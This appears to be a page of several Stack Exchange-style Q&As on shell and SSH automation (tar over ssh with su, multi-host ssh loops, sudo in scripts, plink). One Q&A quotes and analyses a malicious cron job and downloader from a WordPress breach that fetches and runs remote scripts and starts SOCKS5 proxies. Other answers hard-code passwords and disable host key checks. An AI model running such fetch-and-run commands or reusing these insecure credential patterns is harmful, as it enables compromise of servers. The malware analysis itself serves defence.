When I need to copy a file from the local server (server A) to a remote server (server B) via SSH, using a user with enough privileges, I do it successfully like below:
localpath='/this/is/local/path/file1.txt'
remotepath='/this/is/remote/path/'
mypass='MyPassword123'
sshpass -p $mypass scp $localpath username@hostname:$remotepath
Now, I have to transfer a file from server A to server C with a user that doesn't have enough privileges to copy. Once
I'm connected to server C, I need to run su in order to be able to run commands like cd, ls, etc.
Manually, I access the server C via SSH like this:
[root@ServerA ~]# ssh username@hostname
You are trying to access a restricted zone. Only Authorized Users allowed.
Password:
Last login: Sat Jun 13 10:17:40 2020 from XXX.XXX.XXX.XXX
ServerC ~ $
ServerC ~ $ su
Password:
ServerC /home/myuser #
ServerC /home/myuser # cd /documents/backups/
ServerC /documents/backups #
At this moment myuser has superuser privileges and I can run commands.
So, how can I automate the task of copying files from server A to server C, given that I need to run su once I'm connected to server C?
I've tried so far doing like this:
sshpass -p $mypass ssh -t username@hostname "su -c \"cd /documents/backups/ && ls\""
It requests the password for su and I'm able to run cd and ls, but with this command I'm not copying files from server A to server C, only semi-automating the access to server C and running su on server C.
Thanks in advance for any help.
UPDATE
# $TAR | ssh $username@$hostname "$COMMAND"
+ tar -cv -C /this/is/local/path/file1.txt .
+ ssh username@X.X.X.X 'set -x; rm -f /tmp/copy && mknod /tmp/copy p; su - <<< "su_password
set -x; tar -xv -C /this/is/remote/path/ . < /tmp/copy" & cat > /tmp/copy'
tar: /this/is/local/path/file1.txt: Cannot chdir: Not a directory
tar: Error is not recoverable: exiting now
You are trying to access a restricted zone. Only Authorized Users allowed.
Password:
+ rm -f /tmp/copy
+ mknod /tmp/copy p
+ su -
+ cat
Password:
Editorial note: the previous version of this answer used sudo, the current version uses su as requested in the question.
You could use tar and pipes, like so:
TAR="tar -cv -C $localpath ."
UNTAR="tar -xv -C $remotepath ."
PREPARE_PIPE="rm -f /tmp/copy && mknod /tmp/copy p"
NEWLINE=$'\n' # that's the easiest way to get a literal newline
ROOT_PASSWORD=rootpasswordverydangerous
COMMAND="set -x; $PREPARE_PIPE; su - <<< \"${ROOT_PASSWORD}${NEWLINE} set -x; $UNTAR < /tmp/copy\" & cat > /tmp/copy"
$TAR | ssh username@hostname "$COMMAND"
Explanation:
tar -c . archives the current directory into a single file. We aren't passing -f to tar, so that single file is standard output.
tar -x . extracts the content of a single tar archive file to the current directory. We aren't passing -f to tar, so that single file is standard input.
-C <path> tells tar to cd into <path> so that it will be the current directory in which files are copied from/to.
-v just tells tar to list the files tar archives/extracts, for debugging purposes.
Likewise, set -x is just to have bash to emit trace information, for debugging purposes.
So we're archiving $localpath into stdout, and piping it to ssh, which will pipe it to $COMMAND.
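As a minimal local illustration of the same tar pipe (the /tmp/src and /tmp/dst paths are just examples and are assumed to exist), you can copy a directory tree between two local directories with:
tar -cv -C /tmp/src . | tar -xv -C /tmp/dst .
In the real command, ssh simply sits between the two tars and carries the archive stream from server A to server C.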
If there was a way to give su the password in the command line, we would have used something like:
$TAR | ssh ... su --password ${ROOT_PASSWORD} -c "$UNTAR"
and things would have been simple.
But su doesn't have that. su runs like a shell, reading from stdin. So it will first read the password, and once the password is read and su has established a root session, it reads commands from stdin. That's why we have su - <<< \"${ROOT_PASSWORD}${NEWLINE}${UNTAR}\".
But now stdin is used by the password and command, so we can't use it as the archive. We could use another file descriptor, but I prefer not to, because then the solution can be more easily ported to work with sudo instead of su. sudo closes all file descriptors, and sudo -C 200 (only close file descriptors above 200) may not work (didn't work on my test machine).
If we went that direction, we would have used something like:
$TAR | ssh ... 'exec 9<&0 && sudo -S <<< $mypass bash -c "$UNTAR <&9"'
Our next option is to do something like cat > /tmp/archive.tar in order to write the entire archive into a file, and then have something like $UNTAR < /tmp/archive.tar. But the archive may be huge and we may run out of disk space.
So the idea is to create a dedicated pipe - that's PREPARE_PIPE. Pipes don't save anything to disk, and don't store the entire stream in memory, so the reader and the writer have to work concurrently (you know, like with a real pipe).
So having redirected su's stdin from $ROOT_PASSWORD, we pull ssh's stdin into our pipe with cat > /tmp/copy, and in parallel (&) having $UNTAR read from the pipe (< /tmp/copy).
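If you want to see the pipe behaviour in isolation, here is a minimal local sketch (mkfifo has the same effect as mknod /tmp/copy p; the /tmp/src and /tmp/dst paths are again just examples):
rm -f /tmp/copy && mkfifo /tmp/copy
tar -xv -C /tmp/dst . < /tmp/copy &    # reader runs in the background
tar -cv -C /tmp/src . > /tmp/copy      # writer feeds the pipe
wait                                   # wait for the background reader to finish
rm -f /tmp/copy
Nothing but the extracted files ever touches the disk; the pipe only buffers a small window of the stream.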
Notes:
You could also pass -z to both tar commands to compress the stream, if your network is slow.
tar will preserve the source's metadata, e.g. timestamps and ownership.
Passing $ROOT_PASSWORD to commands is not good practice; anyone who runs ps -ef can see the password. There are ways to pass the password to server C more securely, but I didn't include them in order not to further complicate this answer (a small sketch of one option follows these notes).
I would suggest asking the server's owner to install sudo, so that if the password is compromised via ps -ef, at least it's not the root password.
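As one example of keeping the password out of the script file (this is not from the original answer, just a hedged suggestion), you could prompt for it at run time instead of hard-coding it:
read -r -s -p "root password for server C: " ROOT_PASSWORD && echo
Note this only avoids storing the password in the script; it still ends up inside $COMMAND, so it does not by itself solve the ps -ef exposure mentioned above.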
Related
I have n servers like c0001.test.cloud.com, c0002.test.cloud.com, c0003.test.cloud.com and I want to ssh between these servers like this:
From server c0001, ssh to c0002 and then exit that server.
Come back to c0001, ssh to c0003 and then exit that server.
The script should run this way without requiring any input at runtime, and it should work for any number of servers.
I have written one script :
str1=c0001.test.cloud.com,c0002.test.cloud.com,c0003.test.cloud.com
string="$( cut -d ',' -f 2- <<< "$str1" )"
echo "$string"
for j in $(echo $string | sed "s/,/ /g")
do
ssh appAccount@j
done
But this script is not running fine. I have also tried passing parameters
like -o StrictHostKeyChecking=no and <<'ENDSSH', but it is still not working.
Assuming the number of commands you want to run are small, you could:
Create a script of commands that will run from c0001.test.cloud.com to each of the servers. For example, create a file on your local machine called commands.sh with:
hosts="c0002.test.cloud.com c0003.test.cloud.com"
for host in $hosts; do
ssh -o StrictHostKeyChecking=no -q appAccount@$host <command 1> && <command 2>
done
On your local machine, ssh to c0001.test.cloud.com and execute the commands in commands.sh:
ssh -o StrictHostKeyChecking=no -q appAccount@c0001.test.cloud.com 'bash -s' < commands.sh
However, if your requirements become more complex, a more robust solution might be to use a cluster administration tool such as ClusterShell.
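For example (a sketch only, assuming ClusterShell's clush command is installed on c0001 and the hostnames above are reachable), a single command can be run on all the other servers in one shot:
clush -l appAccount -w c0002.test.cloud.com,c0003.test.cloud.com -b 'uptime'
Here -w takes the comma-separated node list, -l the remote user, and -b gathers identical output from the nodes together.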
Apparently a site I do some volunteer work for was one of a few thousand sites targeted in a recent hack that exploited some vulnerability in WordPress. The result of the breach was a cron job added to the site:
0 */48 * * * cd /tmp;wget clintonandersonperformancehorses.com/test/test;bash test;cd /tmp;rm -rf test
The file it was pulling is this (obviously, don't try to execute it...):
killall -9 perl
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
sh getip >>bug.txt
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
bash mbind clean.txt
bash binded.txt
cd ..
rm -rf stest
I was hoping someone could tell me what it does? I cleaned out the cron job and will follow all the other advice available to secure the site again, but I am worried that some additional damage might have been done that is not as obvious. I just can't figure out what the heck that file was actually doing.
I just can't figure out what the heck that file was actually doing.
Quick Summary
In summary, it kills all perl processes and then starts up SOCKS5 servers on all of the machine's external IP addresses.
In Depth
In more detail, let's look at the script line-by-line:
killall -9 perl
This kills all perl processes.
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
The above downloads the file stest.tar into /tmp, untars it (creating the /tmp/stest directory), deletes the tar file, and moves into the directory that now holds the downloaded files.
sh getip >>bug.txt
The getip script, part of stest.tar, uses icanhazip.com to find your public IP address and stores that in the file bug.txt.
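The exact contents of getip aren't shown here, but that kind of lookup typically boils down to a one-liner such as:
curl -s icanhazip.com
which simply prints the public IP address the request came from.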
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
The above uses ifconfig to check for any other non-local IP addresses that your machine answers to and adds them to bug.txt. Duplicates are removed and the final list of your public IP addresses is saved in the file clean.txt.
bash mbind clean.txt
This is the meat of the script. mbind, which was part of stest.tar, runs the script inst on each IP address in clean.txt. For each IP address, inst, also part of stest.tar, selects a port at random and starts a copy of "Simple SOCKS5 Server for Perl" on that IP and that port.
More specifically, the SOCKS server that is run is version 1.4 of Simple Socks Server for Perl, which can be downloaded from sourceforge. The version used here differs from the sourceforge version in only minor respects: a help message is suppressed, the md5 option is removed, and the IP and port are included in the script rather than passed in on the command line. I suspect that the purpose of the latter change is to make the script's command line look relatively innocuous when viewed with a utility such as ps.
bash binded.txt
The script binded.txt was created by inst. It apparently runs a check on the SOCKS5 server.
cd ..
rm -rf stest
The last part just does clean-up. It removes all the un-tarred files and the temporary files created by the scripts.
How to determine if one of the SOCKS servers is still running
The script inst (part of the .tar file) starts each SOCKS server with the command:
/usr/bin/perl httpd
To see if one is still running, look through the output of ps wax and check whether that command appears. If it does, use the kill command to stop it.
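A quick way to do both (the brackets in the grep pattern just keep grep from matching its own process; pkill is assumed to be available):
ps wax | grep '[p]erl httpd'     # lists any surviving SOCKS servers
pkill -9 -f 'perl httpd'         # kills them, if any were found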
Hi everyone, I'm new to ksh. What I'm trying to do is write a script to scp one (or many) zip files from a local directory to a remote host, then have the script ssh into the remote host and gunzip the files I just scp'd over. Is there a simple way to do this? I keep trying, but once I ssh over to the remote host the rest of my commands no longer run, like the cd /file/directory and then gzip -d /files etc.
NB: don't confuse "zip" and "gzip", two different animals
This should work:
cd <local_directory>
# collect files names as $1 $2 ... $N
set -- *.gz # or use your own filter like "dumps*.gz"
# put source file a tar archive and send it as input to ssh
# then, on the other side, untar the file then decompress
tar cf - $* | ssh <user>@<remote_host> "cd <remote dir> && tar xf - && gunzip $*"
Note: using "&&" instead of ";" prevents the "tar" command from being executed if "cd" fails for any reason.
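A filled-in version of the same idea, purely as an illustration (the directory names, user and host below are made up):
cd /data/dumps
set -- *.gz
tar cf - $* | ssh deploy@remote.example.com "cd /var/tmp && tar xf - && gunzip $*"
The local $* is expanded before ssh runs, so the remote gunzip sees exactly the same file names that were archived.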
I want to write a shell script to automate a series of commands. The problem is some commands MUST be run as superuser and some commands MUST NOT be run as superuser. What I have done so far is something like this:
#!/bin/bash
command1
sudo command2
command3
sudo command4
The problem is, this means somebody has to wait until command1 finishes before they are prompted for a password, then, if command3 takes long enough, they will then have to wait for command3 to finish. It would be nice if the person could get up and walk away, then come back an hour later and be done. For example, the following script has this problem:
#!/bin/bash
sleep 310
sudo echo "Hi, I'm root"
sleep 310
sudo echo "I'm still root?"
How can I make it so that the user can just enter their password once, at the very start, and then walk away?
Update:
Thanks for the responses. I'm running Mac OS X Lion; I ran Stephen P's script and got different results (I also added $HOME):
pair@abbey scratch$ ./test2.sh
uid is 501
user is pair
username is
home directory is /Users/pair
pair@abbey scratch$ sudo ./test2.sh
Password:
uid is 0
user is root
username is root
home directory is /Users/pair
File sutest
#!/bin/bash
echo "uid is ${UID}"
echo "user is ${USER}"
echo "username is ${USERNAME}"
Run it: ./sutest gives me
uid is 500
user is stephenp
username is stephenp
but using sudo: sudo ./sutest gives
uid is 0
user is root
username is stephenp
So you retain the original user name in $USERNAME when running as sudo. This leads to a solution similar to what others posted:
#!/bin/bash
sudo -u ${USERNAME} normal_command_1
root_command_1
root_command_2
sudo -u ${USERNAME} normal_command_2
# etc.
Just use sudo to invoke your script in the first place; it will prompt for the password once.
I originally wrote this answer on Linux, which does have some differences from OS X.
OS X (I'm testing this on Mountain Lion 10.8.3) has an environment variable SUDO_USER when you're running sudo, which can be used in place of USERNAME above, or to be more cross-platform the script could check to see if SUDO_USER is set and use it if so, or use USERNAME if that's set.
Changing the original script for OS X, it becomes...
#!/bin/bash
sudo -u ${SUDO_USER} normal_command_1
root_command_1
root_command_2
sudo -u ${SUDO_USER} normal_command_2
# etc.
A first stab at making it cross-platform could be...
#!/bin/bash
#
# set "THE_USER" to SUDO_USER if that's set,
# else set it to USERNAME if THAT is set,
# else set it to the string "unknown"
# should probably then test to see if it's "unknown"
#
THE_USER=${SUDO_USER:-${USERNAME:-unknown}}
sudo -u ${THE_USER} normal_command_1
root_command_1
root_command_2
sudo -u ${THE_USER} normal_command_2
# etc.
You should run your entire script as superuser. If you want to run some command as a non-superuser, use the "-u" option of sudo:
#!/bin/bash
sudo -u username command1
command2
sudo -u username command3
command4
When running as root, sudo doesn't ask for a password.
If you use this, check man sudo too:
#!/bin/bash
sudo echo "Hi, I'm root"
sudo -u nobody echo "I'm nobody"
sudo -u 1000 touch /test_user
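With this approach the script itself is started once with sudo, so the single password prompt happens up front (the script name below is just a placeholder):
sudo ./myscript.sh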
Well, you have some options.
You could configure sudo to not prompt for a password. This is not recommended, due to the security risks.
You could write an expect script to read the password and supply it to sudo when required, but that's clunky and fragile.
I would recommend designing the script to run as root and drop its privileges whenever they're not needed. Simply have it sudo -u someotheruser command for the commands that don't require root.
(If they have to run specifically as the user invoking the script, then you could have the script save the uid and invoke a second script via sudo with the id as an argument, so it knows who to su to.)
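A minimal sketch of that last idea, assuming a wrapper script and a worker script with made-up names:
#!/bin/bash
# wrapper.sh - run as the normal user; re-invokes the worker as root,
# passing along the invoking user's name so it can drop privileges later
exec sudo ./worker.sh "$USER"

#!/bin/bash
# worker.sh - runs as root; $1 is the original user
ORIG_USER="$1"
root_command_1
sudo -u "$ORIG_USER" normal_command_1
root_command_1 and normal_command_1 here are placeholders, just like in the snippets above.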
I'm using plink to run a command on a Unix remote machine.
The command is:
ls -1trd testegrep.txt |tail -1 |xargs tail -f| grep 's';
The way I'm sending this command is by using a file with a set of commands like:
plink.exe -ssh -t -l user -pw pwd tst.url.pt -m commands.out
When I run the command this way, plink does not receive any input. It seems that it is waiting for input.
But if I run:
plink.exe -ssh -t -l user -pw pwd tst.url.pt "ls -1trd testegrep.txt |tail -1 |xargs tail -f| grep 's';"
I get the expected result.
I'm not using plink with a command file by choice. I'm using test automation software that allows me to run tests on remote hosts, and this is the way the tool works.
Any thoughts on what is going wrong?
I tested the command you provided and it worked without problems.
Maybe the problem is related to:
The server's host key is not cached in the registry.
The path to the file is not correct.
The file is empty.
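If it is the missing host key, one common (if blunt) workaround is to answer plink's caching prompt once by piping a "y" into it, for example:
echo y | plink.exe -ssh -l user -pw pwd tst.url.pt "exit"
After the key is cached in the registry, the run with -m commands.out should no longer stall on the prompt.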
Include the server hostkey.
Most importantly, you need to include the unix profile using the -m parameter.
You can also include all your commands in the same file where the profile is kept.
$Output = ((plink.exe -hostkey hostkey -l UNAME -i SSHKEY -P 22 -ssh server -batch -m PROFILE) | ? {$_ -ne ""})